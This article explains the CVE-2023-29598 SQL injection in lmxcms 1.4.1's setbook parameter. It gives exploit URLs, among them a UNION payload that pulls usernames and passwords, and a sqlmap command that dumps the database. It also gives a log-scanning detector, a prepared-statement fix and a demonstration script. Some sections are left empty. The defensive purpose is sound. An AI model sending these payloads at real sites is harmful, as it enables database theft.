In April 2023, a critical SQL injection vulnerability—tracked as CVE-2023-29598—was found in the popular open-source content management system, lmxcms, version 1.4.1. This flaw allows attackers to manipulate SQL queries by sending carefully crafted input through the setbook parameter at index.php. In this article, we'll break down this vulnerability in simple language, show you sample code to exploit it, and provide advice on how to protect your site.

What is SQL Injection?

SQL injection (SQLi) is a web security vulnerability that allows attackers to interfere with the queries an application makes to its database. Successful attacks can read sensitive data, modify databases, and sometimes even execute commands on the server.

Vulnerability Details

Impacted software:  
lmxcms v1.4.1

Vulnerable file:  
index.php

Vulnerable parameter:  
setbook

When the website receives input via the setbook parameter, it fails to properly sanitize it before using it in SQL queries. That means an attacker can craft input that changes the SQL command sent to the database, granting access to sensitive data or allowing additional destructive actions.

Let's look at a code snippet that might be found in an affected version of index.php (illustrative, not the project's exact source):

<?php
// BAD CODE: vulnerable to SQLi ($conn is an open mysqli connection)
$setbook = $_GET['setbook'];
// The raw request value is spliced straight into the SQL text, so a quote in
// the input ends the literal and whatever follows is parsed as SQL.
$sql = "SELECT * FROM books WHERE id = '$setbook'";
$result = mysqli_query($conn, $sql);

If a user visits:  
http://example.com/index.php?setbook=123

The resulting SQL query would be:

SELECT * FROM books WHERE id = '123'

But what if an attacker enters this instead?

http://example.com/index.php?setbook=123' OR '1'='1

Now the query becomes:

SELECT * FROM books WHERE id = '123' OR '1'='1'

Because '1'='1' is always true, the attacker can retrieve all records from the books table!

Open the vulnerable page:

http://target-site.com/index.php?setbook=1


http://target-site.com/index.php?setbook=1'


http://target-site.com/index.php?setbook=1' UNION SELECT username, password FROM users-- -

Automating the Attack with sqlmap

sqlmap is a popular open-source tool for automating SQLi attacks.

Example command:

sqlmap -u "http://target-site.com/index.php?setbook=1" --risk=3 --level=5 --dump

This tells sqlmap to scan the URL and try to dump the database contents.
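On the defending side, the same request pattern is what to look for in the web server's access logs: a setbook value that is not a plain integer, SQL metacharacters or keywords inside it, and sqlmap's default User-Agent, which names the tool (a scanner can change it, so that signal is weak on its own). The log scanner below is an added example written for this article, not part of the article's original material or of lmxcms; the log lines, client addresses and sizes are constructed, and the combined log format with a user-agent field is assumed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample of combined-format access log lines (client IP, timestamp, request,
# status, size, referer, user agent). Addresses, sizes and agents are made up for the demo.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Apr/2023:14:15:01 +0000] "GET /index.php?setbook=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Apr/2023:14:15:02 +0000] "GET /index.php?setbook=1%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Apr/2023:14:15:03 +0000] "GET /index.php?setbook=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 98210 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Apr/2023:14:16:40 +0000] "GET /index.php?setbook=2 HTTP/1.1" 200 5100 "-" "sqlmap/1.7 (https://sqlmap.org)"
192.0.2.9 - - [13/Apr/2023:14:17:00 +0000] "GET /index.php?setbook=42 HTTP/1.1" 200 5099 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Quotes, comment openers and the keywords that show up in injection probes.
SQL_MARKERS = re.compile(r"""['"]|--|/\*|\b(or|and|union|select|sleep|benchmark)\b""", re.IGNORECASE)

def parse_line(line):
    """Return the parsed fields plus the URL-decoded setbook value(s), or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    query = parse_qs(urlsplit(entry["target"]).query, keep_blank_values=True)
    entry["setbook"] = query.get("setbook", [])   # parse_qs already percent-decodes
    return entry

def classify(entry):
    """Reasons this request looks like a probe of the setbook parameter (empty list if clean)."""
    reasons = set()
    for value in entry["setbook"]:
        if not value.isdigit():             # a book id should be a plain integer
            reasons.add("non-numeric setbook")
        if SQL_MARKERS.search(value):
            reasons.add("sql metacharacters or keywords in setbook")
    if "sqlmap" in entry["ua"].lower():     # sqlmap's default User-Agent names itself; easily changed
        reasons.add("sqlmap user-agent")
    return sorted(reasons)

def scan_log(text):
    """Scan log text and return (ip, setbook values, reasons) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append((entry["ip"], entry["setbook"], reasons))
    return findings

if __name__ == "__main__":
    for ip, values, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip:14} setbook={values} -> {', '.join(reasons)}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents. The strongest signal is the shape check (setbook should only ever be an integer), because it does not depend on a keyword list; the response size jump on the third constructed line (the whole table coming back) is the kind of secondary indicator worth alerting on as well.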

Discovery and References

Original Disclosure:  
- CVE-2023-29598 @ NVD
- GitHub Issue/PoC *(if available)*

How to Fix

Developers:

Fixed Code Example

<?php
// SAFE CODE: using prepared statements ($conn is an open mysqli connection)
$setbook = $_GET['setbook'];
// The SQL text is fixed; the value is sent to the server separately as a bound
// parameter, so quotes or keywords in it can never alter the query's structure.
$stmt = $conn->prepare("SELECT * FROM books WHERE id = ?");
$stmt->bind_param("s", $setbook);
$stmt->execute();
$result = $stmt->get_result();
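The walkthrough earlier in the article (the setbook=123' OR '1'='1 request returning every row) and the prepared-statement fix just shown can be reproduced end to end in one small script. This is an added example written for this article, not code from lmxcms; it uses Python's sqlite3 with a constructed three-row books table in place of the CMS database, and the column names are assumptions. It shows the vulnerable string-built query returning all rows for the article's payload, the parameterized query returning nothing for the same input, and an allow-list check that rejects the input before any query runs.

```python
import re
import sqlite3

# Constructed stand-in for the CMS "books" table; lmxcms' real schema is not on the
# page, so the column names and rows here are assumptions for the demo.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO books (id, title) VALUES (?, ?)",
                     [(1, "First"), (2, "Second"), (123, "Target")])
    conn.commit()
    return conn

def lookup_vulnerable(conn, setbook):
    """Same mistake as the article's BAD CODE: the raw parameter is spliced into the SQL
    text, so a quote in the input ends the literal and the rest is parsed as SQL."""
    sql = f"SELECT id, title FROM books WHERE id = '{setbook}'"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, setbook):
    """Same idea as the article's SAFE CODE: the value travels as a bound parameter and is
    compared as data, never parsed as part of the statement."""
    return conn.execute("SELECT id, title FROM books WHERE id = ?", (setbook,)).fetchall()

def is_valid_setbook(setbook):
    """Allow-list check: a book id is a short positive integer and nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", setbook) is not None

def lookup_validated(conn, setbook):
    """Defence in depth: reject anything that is not a plain integer before touching the
    database, then still bind it as a typed parameter."""
    if not is_valid_setbook(setbook):
        raise ValueError("setbook must be a positive integer")
    return conn.execute("SELECT id, title FROM books WHERE id = ?", (int(setbook),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "123' OR '1'='1"   # the request from the walkthrough, URL-decoded
    print("vulnerable   :", lookup_vulnerable(db, payload))     # every row comes back
    print("parameterized:", lookup_parameterized(db, payload))  # no row has that literal id
    try:
        lookup_validated(db, payload)
    except ValueError as err:
        print("validated    : rejected ->", err)
```

The parameterized lookup alone closes the injection; the validation step is there because id is numeric, so the handler has no reason to accept anything else, and rejecting early gives you a clean place to log the attempt. In the PHP fix the equivalent is to cast or validate the value and bind it with the "i" type instead of "s".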

Admins:

Final Thoughts

SQL injection is a classic yet highly dangerous bug that still affects modern web apps. CVE-2023-29598 in lmxcms v1.4.1 is a clear example of how a simple coding mistake can put your whole website—and your users—at risk. If you’re using lmxcms, check your version, patch immediately, and review your code for similar security holes.

Further Reading

- OWASP SQL Injection Cheat Sheet
- How to Fix SQL Injection

Timeline

Published on: 04/13/2023 14:15:00 UTC
Last modified on: 04/21/2023 17:07:00 UTC